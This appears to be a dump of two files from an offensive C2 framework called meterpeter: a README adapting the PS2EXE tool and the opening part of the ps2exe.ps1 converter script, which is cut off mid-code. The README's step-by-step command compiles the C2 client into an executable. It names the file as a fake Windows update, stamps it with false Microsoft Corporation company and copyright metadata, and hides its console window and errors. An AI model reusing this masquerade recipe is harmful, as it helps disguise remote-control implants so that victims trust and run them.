[
  {
    "path": "PS2EXE/README.md",
    "content": "### ⚙️ PS2EXE BY: Ingo Karstein | MScholtes\r\n\r\n- Description: Script to convert powershell scripts to standalone executables<br />\r\n- Source     :https://gallery.technet.microsoft.com/scriptcenter/PS2EXE-GUI-Convert-e7cb69d5<br /><br />\r\n\r\n`meterpeter users can use this script (manually) to convert the Client.ps1 to Client.exe`<br /><br />\r\n\r\n- 1º - Copy **`'Update-KB4524147.ps1'`** build by meterpeter C2 to **`'PS2EXE'`** directory.\r\n- 2º - Open Powershell terminal console in **`'PS2EXE'`** directory (none admin privs required)\r\n- 3º - Execute the follow command to convert the Client.ps1 to standalone executable<br />\r\n\r\n```\r\n.\\ps2exe.ps1 -inputFile 'Update-KB4524147.ps1' -outputFile 'Update-KB4524147.exe' -iconFile 'meterpeter.ico' -title 'meterpeter binary file' -version '2.10.6' -description 'meterpeter binary file' -product 'meterpeter C2 Client' -company 'Microsoft Corporation' -copyright '©Microsoft Corporation. All Rights Reserved' -noConsole -noVisualStyles -noError\r\n```\r\n\r\n![final](https://user-images.githubusercontent.com/23490060/88741165-d75f2f00-d136-11ea-8761-28b690f0ddf3.png)\r\n\r\n**`REMARK:`** Client.exe (created by PS2EXEC) migth **malfunction** with meterpeter **mimiratz scripts**.\r\n\r\n---\r\n\r\n<br />\r\n\r\n**Syntax:**\r\n```\r\n    ps2exe.ps1 [-inputFile] '<file_name>' [[-outputFile] '<file_name>'] [-verbose]\r\n               [-debug] [-runtime20|-runtime40] [-lcid <id>] [-x86|-x64] [-STA|-MTA] [-noConsole]\r\n               [-credentialGUI] [-iconFile '<filename>'] [-title '<title>'] [-description '<description>']\r\n               [-company '<company>'] [-product '<product>'] [-copyright '<copyright>'] [-trademark '<trademark>']\r\n               [-version '<version>'] [-configFile] [-noOutput] [-noError] [-noVisualStyles] [-requireAdmin]\r\n               [-supportOS] [-virtualize] [-longPaths]\r\n\r\n     inputFile = Powershell script that you want to convert to executable\r\n    
outputFile = destination executable file name, defaults to inputFile with extension '.exe'\r\n     runtime20 = this switch forces PS2EXE to create a config file for the generated executable that contains the\r\n                 \"supported .NET Framework versions\" setting for .NET Framework 2.0/3.x for PowerShell 2.0\r\n     runtime40 = this switch forces PS2EXE to create a config file for the generated executable that contains the\r\n                 \"supported .NET Framework versions\" setting for .NET Framework 4.x for PowerShell 3.0 or higher\r\n    x86 or x64 = compile for 32-bit or 64-bit runtime only\r\n          lcid = location ID for the compiled executable. Current user culture if not specified\r\n    STA or MTA = 'Single Thread Apartment' or 'Multi Thread Apartment' mode\r\n     noConsole = the resulting executable will be a Windows Forms app without a console window\r\n credentialGUI = use GUI for prompting credentials in console mode\r\n      iconFile = icon file name for the compiled executable\r\n         title = title information (displayed in details tab of Windows Explorer's properties dialog)\r\n   description = description information (not displayed, but embedded in executable)\r\n       company = company information (not displayed, but embedded in executable)\r\n       product = product information (displayed in details tab of Windows Explorer's properties dialog)\r\n     copyright = copyright information (displayed in details tab of Windows Explorer's properties dialog)\r\n     trademark = trademark information (displayed in details tab of Windows Explorer's properties dialog)\r\n       version = version information (displayed in details tab of Windows Explorer's properties dialog)\r\n    configFile = write config file (<outputfile>.exe.config)\r\n      noOutput = the resulting executable will generate no standard output (includes verbose and information channel)\r\n       noError = the resulting executable will generate no error output 
(includes warning and debug channel)\r\nnoVisualStyles = disable visual styles for a generated windows GUI application (only with -noConsole)\r\n  requireAdmin = if UAC is enabled, compiled executable runs only in elevated context (UAC dialog appears if required)\r\n     supportOS = use functions of newest Windows versions (execute [Environment]::OSVersion to see the difference)\r\n    virtualize = application virtualization is activated (forcing x86 runtime)\r\n     longPaths = enable long paths ( > 260 characters) if enabled on OS (works only with Windows 10)\r\n\r\n```\r\n"
  },
  {
    "path": "PS2EXE/ps2exe.ps1",
    "content": "<#\r\n.SYNOPSIS\r\n   Converts powershell scripts to standalone executables.\r\n\r\n.DESCRIPTION\r\n   Converts powershell scripts to standalone executables. GUI output and input is activated with one switch,\r\n   real windows executables are generated. You may use the graphical front end Win-PS2EXE for convenience.\r\n\r\n   Please see Remarks on project page for topics \"GUI mode output formatting\", \"Config files\", \"Password security\",\r\n   \"Script variables\" and \"Window in background in -noConsole mode\".\r\n\r\n   A generated executables has the following reserved parameters:\r\n   -debug              Forces the executable to be debugged. It calls \"System.Diagnostics.Debugger.Break()\".\r\n   -extract:<FILENAME> Extracts the powerShell script inside the executable and saves it as FILENAME. The script will not be executed.\r\n   -wait               At the end of the script execution it writes \"Hit any key to exit...\" and waits for a key to be pressed.\r\n   -end                All following options will be passed to the script inside the executable. All preceding options are used by the executable itself.\r\n\r\n.PARAMETER inputFile\r\n   Powershell script to convert to executable\r\n   \r\n.PARAMETER outputFile\r\n   destination executable file name, defaults to inputFile with extension '.exe'\r\n   \r\n.PARAMETER runtime20\r\n   this switch forces PS2EXE to create a config file for the generated executable that contains the \"supported .NET Framework versions\" setting for .NET Framework 2.0/3.x for PowerShell 2.0\r\n\r\n.PARAMETER runtime40\r\n   this switch forces PS2EXE to create a config file for the generated executable that contains the \"supported .NET Framework versions\" setting for .NET Framework 4.x for PowerShell 3.0 or higher\r\n\r\n.PARAMETER x86\r\n   compile for 32-bit runtime only\r\n\r\n.PARAMETER x64\r\n   compile for 64-bit runtime only\r\n   \r\n.PARAMETER lcid\r\n   location ID for the compiled executable. 
Current user culture if not specified\r\n   \r\n.PARAMETER STA\r\n   Single Thread Apartment mode\r\n   \r\n.PARAMETER MTA\r\n   Multi Thread Apartment mode\r\n   \r\n.PARAMETER nested\r\n   internal use\r\n\r\n.PARAMETER noConsole\r\n   the resulting executable will be a Windows Forms app without a console window. You might want to pipe your output to Out-String to prevent a message box for every line of output (example: dir C:\\ | Out-String)\r\n\r\n.PARAMETER credentialGUI\r\n   use GUI for prompting credentials in console mode instead of console input\r\n\r\n.PARAMETER iconFile\r\n   icon file name for the compiled executable\r\n\r\n.PARAMETER title\r\n   title information (displayed in details tab of Windows Explorer's properties dialog)\r\n\r\n.PARAMETER description\r\n   description information (not displayed, but embedded in executable)\r\n\r\n.PARAMETER company\r\n   company information (not displayed, but embedded in executable)\r\n\r\n.PARAMETER product\r\n   product information (displayed in details tab of Windows Explorer's properties dialog)\r\n\r\n.PARAMETER copyright\r\n   copyright information (displayed in details tab of Windows Explorer's properties dialog)\r\n\r\n.PARAMETER trademark\r\n   trademark information (displayed in details tab of Windows Explorer's properties dialog)\r\n\r\n.PARAMETER version\r\n   version information (displayed in details tab of Windows Explorer's properties dialog)\r\n\r\n.PARAMETER configFile\r\n   write a config file (<outputfile>.exe.config)\r\n\r\n.PARAMETER noConfigFile\r\n   compatibility parameter\r\n\r\n.PARAMETER noOutput\r\n   the resulting executable will generate no standard output (includes verbose and information channel)\r\n\r\n.PARAMETER noError\r\n   the resulting executable will generate no error output (includes warning and debug channel)\r\n\r\n.PARAMETER noVisualStyles\r\n   disable visual styles for a generated windows GUI application. 
Only applicable with parameter -noConsole\r\n\r\n.PARAMETER requireAdmin\r\n   if UAC is enabled, compiled executable will run only in elevated context (UAC dialog appears if required)\r\n\r\n.PARAMETER supportOS\r\n   use functions of newest Windows versions (execute [Environment]::OSVersion to see the difference)\r\n\r\n.PARAMETER virtualize\r\n   application virtualization is activated (forcing x86 runtime)\r\n\r\n.PARAMETER longPaths\r\n   enable long paths ( > 260 characters) if enabled on OS (works only with Windows 10)\r\n\r\n.EXAMPLE\r\n   ps2exe.ps1 C:\\Data\\MyScript.ps1\r\n   Compiles C:\\Data\\MyScript.ps1 to C:\\Data\\MyScript.exe as console executable\r\n\r\n.EXAMPLE\r\n   ps2exe.ps1 -inputFile C:\\Data\\MyScript.ps1 -outputFile C:\\Data\\MyScriptGUI.exe -iconFile C:\\Data\\Icon.ico -noConsole -title \"MyScript\" -version 0.0.0.1\r\n   Compiles C:\\Data\\MyScript.ps1 to C:\\Data\\MyScriptGUI.exe as graphical executable, icon and meta data\r\n\r\n.NOTES\r\n   Version: 0.5.0.21\r\n   Date: 2020-07-10\r\n   Author: Ingo Karstein, Markus Scholtes\r\n\r\n.LINK\r\n   https://gallery.technet.microsoft.com/PS2EXE-GUI-Convert-e7cb69d5\r\n#>\r\n\r\nParam([STRING]$inputFile = $NULL, [STRING]$outputFile = $NULL, [SWITCH]$verbose, [SWITCH]$debug, [SWITCH]$runtime20, [SWITCH]$runtime40,\r\n\t[SWITCH]$x86, [SWITCH]$x64, [int]$lcid, [SWITCH]$STA, [SWITCH]$MTA, [SWITCH]$nested, [SWITCH]$noConsole, [SWITCH]$credentialGUI,\r\n\t[STRING]$iconFile = $NULL, [STRING]$title, [STRING]$description, [STRING]$company, [STRING]$product, [STRING]$copyright, [STRING]$trademark,\r\n\t[STRING]$version, [SWITCH]$configFile, [SWITCH]$noConfigFile, [SWITCH]$noOutput, [SWITCH]$noError, [SWITCH]$noVisualStyles, [SWITCH]$requireAdmin,\r\n\t[SWITCH]$supportOS, [SWITCH]$virtualize, [SWITCH]$longPaths)\r\n\r\n<################################################################################>\r\n<##                                                                            ##>\r\n<##      
PS2EXE-GUI v0.5.0.21                                                  ##>\r\n<##      Written by: Ingo Karstein (http://blog.karstein-consulting.com)       ##>\r\n<##      Reworked and GUI support by Markus Scholtes                           ##>\r\n<##                                                                            ##>\r\n<##      This script is released under Microsoft Public Licence                ##>\r\n<##          that can be downloaded here:                                      ##>\r\n<##          http://www.microsoft.com/opensource/licenses.mspx#Ms-PL           ##>\r\n<##                                                                            ##>\r\n<################################################################################>\r\n\r\nif (!$nested)\r\n{\r\n\tWrite-Output \"   PS2EXE - v0.5.0.21 by Ingo Karstein, reworked and GUI support by Markus Scholtes\"\r\n}\r\nelse\r\n{\r\n\tWrite-Output \"PowerShell 2.0 environment started...\"\r\n}\r\n\r\nif ([STRING]::IsNullOrEmpty($inputFile))\r\n{\r\n\tWrite-Output \"Usage:`n\"\r\n\tWrite-Output \"powershell.exe -command \"\"&'.\\ps2exe.ps1' [-inputFile] '<filename>' [[-outputFile] '<filename>'] [-verbose]\"\r\n\tWrite-Output \"               [-debug] [-runtime20|-runtime40] [-x86|-x64] [-lcid <id>] [-STA|-MTA] [-noConsole]\"\r\n\tWrite-Output \"               [-credentialGUI] [-iconFile '<filename>'] [-title '<title>'] [-description '<description>']\"\r\n\tWrite-Output \"               [-company '<company>'] [-product '<product>'] [-copyright '<copyright>'] [-trademark '<trademark>']\"\r\n\tWrite-Output \"               [-version '<version>'] [-configFile] [-noOutput] [-noError] [-noVisualStyles] [-requireAdmin]\"\r\n\tWrite-Output \"               [-supportOS] [-virtualize] [-longPaths]\"\"`n\"\r\n\tWrite-Output \"     inputFile = Powershell script that you want to convert to executable\"\r\n\tWrite-Output \"    outputFile = destination executable file name, defaults to inputFile with extension 
'.exe'\"\r\n\tWrite-Output \"     runtime20 = this switch forces PS2EXE to create a config file for the generated executable that contains the\"\r\n\tWrite-Output \"                 \"\"supported .NET Framework versions\"\" setting for .NET Framework 2.0/3.x for PowerShell 2.0\"\r\n\tWrite-Output \"     runtime40 = this switch forces PS2EXE to create a config file for the generated executable that contains the\"\r\n\tWrite-Output \"                 \"\"supported .NET Framework versions\"\" setting for .NET Framework 4.x for PowerShell 3.0 or higher\"\r\n\tWrite-Output \"    x86 or x64 = compile for 32-bit or 64-bit runtime only\"\r\n\tWrite-Output \"          lcid = location ID for the compiled executable. Current user culture if not specified\"\r\n\tWrite-Output \"    STA or MTA = 'Single Thread Apartment' or 'Multi Thread Apartment' mode\"\r\n\tWrite-Output \"     noConsole = the resulting executable will be a Windows Forms app without a console window\"\r\n\tWrite-Output \" credentialGUI = use GUI for prompting credentials in console mode\"\r\n\tWrite-Output \"      iconFile = icon file name for the compiled executable\"\r\n\tWrite-Output \"         title = title information (displayed in details tab of Windows Explorer's properties dialog)\"\r\n\tWrite-Output \"   description = description information (not displayed, but embedded in executable)\"\r\n\tWrite-Output \"       company = company information (not displayed, but embedded in executable)\"\r\n\tWrite-Output \"       product = product information (displayed in details tab of Windows Explorer's properties dialog)\"\r\n\tWrite-Output \"     copyright = copyright information (displayed in details tab of Windows Explorer's properties dialog)\"\r\n\tWrite-Output \"     trademark = trademark information (displayed in details tab of Windows Explorer's properties dialog)\"\r\n\tWrite-Output \"       version = version information (displayed in details tab of Windows Explorer's properties 
dialog)\"\r\n\tWrite-Output \"    configFile = write a config file (<outputfile>.exe.config)\"\r\n\tWrite-Output \"      noOutput = the resulting executable will generate no standard output (includes verbose and information channel)\"\r\n\tWrite-Output \"       noError = the resulting executable will generate no error output (includes warning and debug channel)\"\r\n\tWrite-Output \"noVisualStyles = disable visual styles for a generated windows GUI application (only with -noConsole)\"\r\n\tWrite-Output \"  requireAdmin = if UAC is enabled, compiled executable runs only in elevated context (UAC dialog appears if required)\"\r\n\tWrite-Output \"     supportOS = use functions of newest Windows versions (execute [Environment]::OSVersion to see the difference)\"\r\n\tWrite-Output \"    virtualize = application virtualization is activated (forcing x86 runtime)\"\r\n\tWrite-Output \"     longPaths = enable long paths ( > 260 characters) if enabled on OS (works only with Windows 10)`n\"\r\n\tWrite-Output \"Input file not specified!\"\r\n\texit -1\r\n}\r\n\r\n$psversion = 0\r\nif ($PSVersionTable.PSVersion.Major -ge 4)\r\n{\r\n\t$psversion = 4\r\n\t#Write-Output \"You are using PowerShell 4.0 or above.\"\r\n}\r\n\r\nif ($PSVersionTable.PSVersion.Major -eq 3)\r\n{\r\n\t$psversion = 3\r\n\tWrite-Output \"You are using PowerShell 3.0.\"\r\n}\r\n\r\nif ($PSVersionTable.PSVersion.Major -eq 2)\r\n{\r\n\t$psversion = 2\r\n\tWrite-Output \"You are using PowerShell 2.0.\"\r\n}\r\n\r\nif ($psversion -eq 0)\r\n{\r\n\tWrite-Error \"The powershell version is unknown!\"\r\n\texit -1\r\n}\r\n\r\n# resolve to absolute paths, regardless of whether the path was given as relative or absolute\r\n$inputFile = $ExecutionContext.SessionState.Path.GetUnresolvedProviderPathFromPSPath($inputFile)\r\nif ([STRING]::IsNullOrEmpty($outputFile))\r\n{\r\n\t$outputFile = ([System.IO.Path]::Combine([System.IO.Path]::GetDirectoryName($inputFile), 
[System.IO.Path]::GetFileNameWithoutExtension($inputFile)+\".exe\"))\r\n}\r\nelse\r\n{\r\n\t$outputFile = $ExecutionContext.SessionState.Path.GetUnresolvedProviderPathFromPSPath($outputFile)\r\n}\r\n\r\nif (!(Test-Path $inputFile -PathType Leaf))\r\n{\r\n\tWrite-Error \"   Input file  => $($inputfile) not found!\"\r\n\texit -1\r\n}\r\n\r\nif ($inputFile -eq $outputFile)\r\n{\r\n\tWrite-Error \"   Input file is identical to output file!\"\r\n\texit -1\r\n}\r\n\r\nif (($outputFile -notlike \"*.exe\") -and ($outputFile -notlike \"*.com\"))\r\n{\r\n\tWrite-Error \"Output file must have extension '.exe' or '.com'!\"\r\n\texit -1\r\n}\r\n\r\nif (!([STRING]::IsNullOrEmpty($iconFile)))\r\n{\r\n\t# resolve to an absolute path, regardless of whether the path was given as relative or absolute\r\n\t$iconFile = $ExecutionContext.SessionState.Path.GetUnresolvedProviderPathFromPSPath($iconFile)\r\n\r\n\tif (!(Test-Path $iconFile -PathType Leaf))\r\n\t{\r\n\t\tWrite-Error \"Icon file $($iconFile) not found!\"\r\n\t\texit -1\r\n\t}\r\n}\r\n\r\nif ($requireAdmin -and $virtualize)\r\n{\r\n\tWrite-Error \"-requireAdmin cannot be combined with -virtualize\"\r\n\texit -1\r\n}\r\nif ($supportOS -and $virtualize)\r\n{\r\n\tWrite-Error \"-supportOS cannot be combined with -virtualize\"\r\n\texit -1\r\n}\r\nif ($longPaths -and $virtualize)\r\n{\r\n\tWrite-Error \"-longPaths cannot be combined with -virtualize\"\r\n\texit -1\r\n}\r\n\r\nif ($runtime20 -and $runtime40)\r\n{\r\n\tWrite-Error \"You cannot use switches -runtime20 and -runtime40 at the same time!\"\r\n\texit -1\r\n}\r\n\r\nif (!$runtime20 -and !$runtime40)\r\n{\r\n\tif ($psversion -eq 4)\r\n\t{\r\n\t\t$runtime40 = $TRUE\r\n\t}\r\n\telseif ($psversion -eq 3)\r\n\t{\r\n\t\t$runtime40 = $TRUE\r\n\t}\r\n\telse\r\n\t{\r\n\t\t$runtime20 = $TRUE\r\n\t}\r\n}\r\n\r\nif ($runtime20 -and $longPaths)\r\n{\r\n\tWrite-Error \"Long paths are only available with .Net 4\"\r\n\texit -1\r\n}\r\n\r\n$CFGFILE = $FALSE\r\nif ($configFile)\r\n{ $CFGFILE = $TRUE\r\n\tif 
($noConfigFile)\r\n\t{\r\n\t\tWrite-Error \"-configFile cannot be combined with -noConfigFile\"\r\n\t\texit -1\r\n\t}\r\n}\r\nif (!$CFGFILE -and $longPaths)\r\n{\r\n\tWrite-Warning \"Forcing generation of a config file, since the option -longPaths requires this\"\r\n\t$CFGFILE = $TRUE\r\n}\r\n\r\nif ($STA -and $MTA)\r\n{\r\n\tWrite-Error \"You cannot use switches -STA and -MTA at the same time!\"\r\n\texit -1\r\n}\r\n\r\nif ($psversion -ge 3 -and $runtime20)\r\n{\r\n\tWrite-Output \"To create an EXE file for PowerShell 2.0 on PowerShell 3.0 or above this script now launches PowerShell 2.0...`n\"\r\n\r\n\t$arguments = \"-inputFile '$($inputFile)' -outputFile '$($outputFile)' -nested \"\r\n\r\n\tif ($verbose) { $arguments += \"-verbose \"}\r\n\tif ($debug) { $arguments += \"-debug \"}\r\n\tif ($runtime20) { $arguments += \"-runtime20 \"}\r\n\tif ($x86) { $arguments += \"-x86 \"}\r\n\tif ($x64) { $arguments += \"-x64 \"}\r\n\tif ($lcid) { $arguments += \"-lcid $lcid \"}\r\n\tif ($STA) { $arguments += \"-STA \"}\r\n\tif ($MTA) { $arguments += \"-MTA \"}\r\n\tif ($noConsole) { $arguments += \"-noConsole \"}\r\n\tif (!([STRING]::IsNullOrEmpty($iconFile))) { $arguments += \"-iconFile '$($iconFile)' \"}\r\n\tif (!([STRING]::IsNullOrEmpty($title))) { $arguments += \"-title '$($title)' \"}\r\n\tif (!([STRING]::IsNullOrEmpty($description))) { $arguments += \"-description '$($description)' \"}\r\n\tif (!([STRING]::IsNullOrEmpty($company))) { $arguments += \"-company '$($company)' \"}\r\n\tif (!([STRING]::IsNullOrEmpty($product))) { $arguments += \"-product '$($product)' \"}\r\n\tif (!([STRING]::IsNullOrEmpty($copyright))) { $arguments += \"-copyright '$($copyright)' \"}\r\n\tif (!([STRING]::IsNullOrEmpty($trademark))) { $arguments += \"-trademark '$($trademark)' \"}\r\n\tif (!([STRING]::IsNullOrEmpty($version))) { $arguments += \"-version '$($version)' \"}\r\n\tif ($noOutput) { $arguments += \"-noOutput \"}\r\n\tif ($noError) { $arguments += \"-noError \"}\r\n\tif 
($requireAdmin) { $arguments += \"-requireAdmin \"}\r\n\tif ($virtualize) { $arguments += \"-virtualize \"}\r\n\tif ($credentialGUI) { $arguments += \"-credentialGUI \"}\r\n\tif ($supportOS) { $arguments += \"-supportOS \"}\r\n\tif ($configFile) { $arguments += \"-configFile \"}\r\n\tif ($noConfigFile) { $arguments += \"-noConfigFile \"}\r\n\r\n\tif ($MyInvocation.MyCommand.CommandType -eq \"ExternalScript\")\r\n\t{\t# ps2exe.ps1 is running (script)\r\n\t\t$jobScript = @\"\r\n.\"$($PSHOME)\\powershell.exe\" -version 2.0 -command \"&'$($MyInvocation.MyCommand.Path)' $($arguments)\"\r\n\"@\r\n\t}\r\n\telse\r\n\t{ # ps2exe.exe is running (compiled script)\r\n\t\tWrite-Warning \"The parameter -runtime20 is not supported for compiled ps2exe.ps1 scripts.\"\r\n\t\tWrite-Warning \"Compile ps2exe.ps1 with parameter -runtime20 and call the generated executable (without -runtime20).\"\r\n\t\texit -1\r\n\t}\r\n\r\n\tInvoke-Expression $jobScript\r\n\r\n\texit 0\r\n}\r\n\r\nif ($psversion -lt 3 -and $runtime40)\r\n{\r\n\tWrite-Error \"You need to run ps2exe in a PowerShell 3.0 or higher environment to use parameter -runtime40\"\r\n\texit -1\r\n}\r\n\r\nif ($psversion -lt 3 -and !$MTA -and !$STA)\r\n{\r\n\t# Set default apartment mode for powershell version if not set by parameter\r\n\t$MTA = $TRUE\r\n}\r\n\r\nif ($psversion -ge 3 -and !$MTA -and !$STA)\r\n{\r\n\t# Set default apartment mode for powershell version if not set by parameter\r\n\t$STA = $TRUE\r\n}\r\n\r\n# escape backslashes in the version info strings, since they are embedded in C# string literals below\r\n$title = $title -replace \"\\\\\", \"\\\\\"\r\n$product = $product -replace \"\\\\\", \"\\\\\"\r\n$copyright = $copyright -replace \"\\\\\", \"\\\\\"\r\n$trademark = $trademark -replace \"\\\\\", \"\\\\\"\r\n$description = $description -replace \"\\\\\", \"\\\\\"\r\n$company = $company -replace \"\\\\\", \"\\\\\"\r\n\r\nif (![STRING]::IsNullOrEmpty($version))\r\n{ # check for correct version number information\r\n\tif ($version -notmatch 
\"(^\\d+\\.\\d+\\.\\d+\\.\\d+$)|(^\\d+\\.\\d+\\.\\d+$)|(^\\d+\\.\\d+$)|(^\\d+$)\")\r\n\t{\r\n\t\tWrite-Error \"Version number has to be supplied in the form n.n.n.n, n.n.n, n.n or n (with n as number)!\"\r\n\t\texit -1\r\n\t}\r\n}\r\n\r\nWrite-Output \"\"\r\n\r\n$type = ('System.Collections.Generic.Dictionary`2') -as \"Type\"\r\n$type = $type.MakeGenericType( @( (\"System.String\" -as \"Type\"), (\"system.string\" -as \"Type\") ) )\r\n$o = [Activator]::CreateInstance($type)\r\n\r\n$compiler20 = $FALSE\r\nif ($psversion -eq 3 -or $psversion -eq 4)\r\n{\r\n\t$o.Add(\"CompilerVersion\", \"v4.0\")\r\n}\r\nelse\r\n{\r\n\tif (Test-Path (\"$ENV:WINDIR\\Microsoft.NET\\Framework\\v3.5\\csc.exe\"))\r\n\t{ $o.Add(\"CompilerVersion\", \"v3.5\") }\r\n\telse\r\n\t{\r\n\t\tWrite-Warning \"No .Net 3.5 compiler found, using .Net 2.0 compiler.\"\r\n\t\tWrite-Warning \"Therefore some methods are not available!\"\r\n\t\t$compiler20 = $TRUE\r\n\t\t$o.Add(\"CompilerVersion\", \"v2.0\")\r\n\t}\r\n}\r\n\r\n$referenceAssembies = @(\"System.dll\")\r\nif (!$noConsole)\r\n{\r\n\tif ([System.AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.ManifestModule.Name -ieq \"Microsoft.PowerShell.ConsoleHost.dll\" })\r\n\t{\r\n\t\t$referenceAssembies += ([System.AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.ManifestModule.Name -ieq \"Microsoft.PowerShell.ConsoleHost.dll\" } | Select-Object -First 1).Location\r\n\t}\r\n}\r\n$referenceAssembies += ([System.AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.ManifestModule.Name -ieq \"System.Management.Automation.dll\" } | Select-Object -First 1).Location\r\n\r\nif ($runtime40)\r\n{\r\n\t$n = New-Object System.Reflection.AssemblyName(\"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\")\r\n\t[System.AppDomain]::CurrentDomain.Load($n) | Out-Null\r\n\t$referenceAssembies += ([System.AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.ManifestModule.Name -ieq \"System.Core.dll\" } 
| Select-Object -First 1).Location\r\n}\r\n\r\nif ($noConsole)\r\n{\r\n\t$n = New-Object System.Reflection.AssemblyName(\"System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\")\r\n\tif ($runtime40)\r\n\t{\r\n\t\t$n = New-Object System.Reflection.AssemblyName(\"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\")\r\n\t}\r\n\t[System.AppDomain]::CurrentDomain.Load($n) | Out-Null\r\n\r\n\t$n = New-Object System.Reflection.AssemblyName(\"System.Drawing, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a\")\r\n\tif ($runtime40)\r\n\t{\r\n\t\t$n = New-Object System.Reflection.AssemblyName(\"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a\")\r\n\t}\r\n\t[System.AppDomain]::CurrentDomain.Load($n) | Out-Null\r\n\r\n\t$referenceAssembies += ([System.AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.ManifestModule.Name -ieq \"System.Windows.Forms.dll\" } | Select-Object -First 1).Location\r\n\t$referenceAssembies += ([System.AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.ManifestModule.Name -ieq \"System.Drawing.dll\" } | Select-Object -First 1).Location\r\n}\r\n\r\n$platform = \"anycpu\"\r\nif ($x64 -and !$x86) { $platform = \"x64\" } else { if ($x86 -and !$x64) { $platform = \"x86\" }}\r\n\r\n$cop = (New-Object Microsoft.CSharp.CSharpCodeProvider($o))\r\n$cp = New-Object System.CodeDom.Compiler.CompilerParameters($referenceAssembies, $outputFile)\r\n$cp.GenerateInMemory = $FALSE\r\n$cp.GenerateExecutable = $TRUE\r\n\r\n$iconFileParam = \"\"\r\nif (!([STRING]::IsNullOrEmpty($iconFile)))\r\n{\r\n\t$iconFileParam = \"`\"/win32icon:$($iconFile)`\"\"\r\n}\r\n\r\n$manifestParam = \"\"\r\nif ($requireAdmin -or $supportOS -or $longPaths)\r\n{\r\n\t$manifestParam = \"`\"/win32manifest:$($outputFile+\".win32manifest\")`\"\"\r\n\t$win32manifest = \"<?xml version=\"\"1.0\"\" encoding=\"\"UTF-8\"\" standalone=\"\"yes\"\"?>`r`n<assembly 
xmlns=\"\"urn:schemas-microsoft-com:asm.v1\"\" manifestVersion=\"\"1.0\"\">`r`n\"\r\n\tif ($longPaths)\r\n\t{\r\n\t\t$win32manifest += \"<application xmlns=\"\"urn:schemas-microsoft-com:asm.v3\"\">`r`n<windowsSettings>`r`n<longPathAware xmlns=\"\"http://schemas.microsoft.com/SMI/2016/WindowsSettings\"\">true</longPathAware>`r`n</windowsSettings>`r`n</application>`r`n\"\r\n\t}\r\n\tif ($requireAdmin)\r\n\t{\r\n\t\t$win32manifest += \"<trustInfo xmlns=\"\"urn:schemas-microsoft-com:asm.v2\"\">`r`n<security>`r`n<requestedPrivileges xmlns=\"\"urn:schemas-microsoft-com:asm.v3\"\">`r`n<requestedExecutionLevel level=\"\"requireAdministrator\"\" uiAccess=\"\"false\"\"/>`r`n</requestedPrivileges>`r`n</security>`r`n</trustInfo>`r`n\"\r\n\t}\r\n\tif ($supportOS)\r\n\t{\r\n\t\t$win32manifest += \"<compatibility xmlns=\"\"urn:schemas-microsoft-com:compatibility.v1\"\">`r`n<application>`r`n<supportedOS Id=\"\"{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}\"\"/>`r`n<supportedOS Id=\"\"{1f676c76-80e1-4239-95bb-83d0f6d0da78}\"\"/>`r`n<supportedOS Id=\"\"{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}\"\"/>`r`n<supportedOS Id=\"\"{35138b9a-5d96-4fbd-8e2d-a2440225f93a}\"\"/>`r`n<supportedOS Id=\"\"{e2011457-1546-43c5-a5fe-008deee3d3f0}\"\"/>`r`n</application>`r`n</compatibility>`r`n\"\r\n\t}\r\n\t$win32manifest += \"</assembly>\"\r\n\t$win32manifest | Set-Content ($outputFile+\".win32manifest\") -Encoding UTF8\r\n}\r\n\r\nif (!$virtualize)\r\n{ $cp.CompilerOptions = \"/platform:$($platform) /target:$( if ($noConsole){'winexe'}else{'exe'}) $($iconFileParam) $($manifestParam)\" }\r\nelse\r\n{\r\n\tWrite-Output \"Application virtualization is activated, forcing x86 platform.\"\r\n\t$cp.CompilerOptions = \"/platform:x86 /target:$( if ($noConsole) { 'winexe' } else { 'exe' } ) /nowin32manifest $($iconFileParam)\"\r\n}\r\n\r\n$cp.IncludeDebugInformation = $debug\r\n\r\nif ($debug)\r\n{\r\n\t$cp.TempFiles.KeepFiles = $TRUE\r\n}\r\n\r\nIf($inputFile -match 'meterpeter'){$parsingPath = $inputFile -replace 
'\\\\PS2EXE',''}else{$parsingPath = $inputFile}\r\nWrite-Output \"   Input  file => $parsingPath\"\r\n$content = Get-Content -LiteralPath $inputFile -Encoding UTF8 -ErrorAction SilentlyContinue\r\nif ([STRING]::IsNullOrEmpty($content))\r\n{\r\n\tWrite-Error \"No data found. May be read error or file protected.\"\r\n\texit -2\r\n}\r\n$scriptInp = [STRING]::Join(\"`r`n\", $content)\r\n$script = [System.Convert]::ToBase64String(([System.Text.Encoding]::UTF8.GetBytes($scriptInp)))\r\n\r\n$culture = \"\"\r\n\r\nif ($lcid)\r\n{\r\n\t$culture = @\"\r\n\tSystem.Threading.Thread.CurrentThread.CurrentCulture = System.Globalization.CultureInfo.GetCultureInfo($lcid);\r\n\tSystem.Threading.Thread.CurrentThread.CurrentUICulture = System.Globalization.CultureInfo.GetCultureInfo($lcid);\r\n\"@\r\n}\r\n\r\n$programFrame = @\"\r\n// Simple PowerShell host created by Ingo Karstein (http://blog.karstein-consulting.com) for PS2EXE\r\n// Reworked and GUI support by Markus Scholtes\r\n\r\nusing System;\r\nusing System.Collections.Generic;\r\nusing System.Text;\r\nusing System.Management.Automation;\r\nusing System.Management.Automation.Runspaces;\r\nusing PowerShell = System.Management.Automation.PowerShell;\r\nusing System.Globalization;\r\nusing System.Management.Automation.Host;\r\nusing System.Security;\r\nusing System.Reflection;\r\nusing System.Runtime.InteropServices;\r\n$(if ($noConsole) {@\"\r\nusing System.Windows.Forms;\r\nusing System.Drawing;\r\n\"@ 